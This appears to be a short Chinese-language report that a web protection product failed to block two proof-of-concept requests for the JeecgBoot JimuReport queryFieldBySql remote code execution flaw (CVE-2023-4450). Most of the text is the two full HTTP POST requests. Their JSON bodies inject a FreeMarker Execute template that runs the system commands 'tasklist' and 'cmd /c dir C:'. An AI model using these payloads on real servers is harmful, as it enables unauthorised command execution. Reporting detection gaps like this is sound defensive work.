jeect-boot积木报表 queryFieldBySql接口RCE漏洞（CVE-2023-4450）的攻击没拦住

预览

如下两个poc都没拦住，版本是社区版。
poc1：

1POST /jmreport/queryFieldBySql HTTP/1.1
2Host: xxx.xxx.xxx.xxx
3X-Forwarded-For: 47.94.167.173
4X-Forwarded-Host: xxx.xxx.xxx.xxx
5X-Forwarded-Proto: https
6Content-Length: 100
7User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
8Accept: */*
9Accept-Language: zh-CN,zh;q=0.9
10Content-Type: application/json
11Cache-Control: no-cache
12Pragma: no-cache

请求体

1{"sql":"select '<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("tasklist") }' "}

poc2:

1POST /jmreport/queryFieldBySql HTTP/1.1
2Host: xxx.xxx.xxx.xxx
3X-Forwarded-For: 47.94.167.173
4X-Forwarded-Host: xxx.xxx.xxx.xxx
5X-Forwarded-Proto: https
6Content-Length: 105
7User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
8Accept: */*
9Accept-Language: zh-CN,zh;q=0.9
10Content-Type: application/json
11Cache-Control: no-cache
12Pragma: no-cache

请求体

1{"sql":"select '<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cmd /c dir C:") }' "}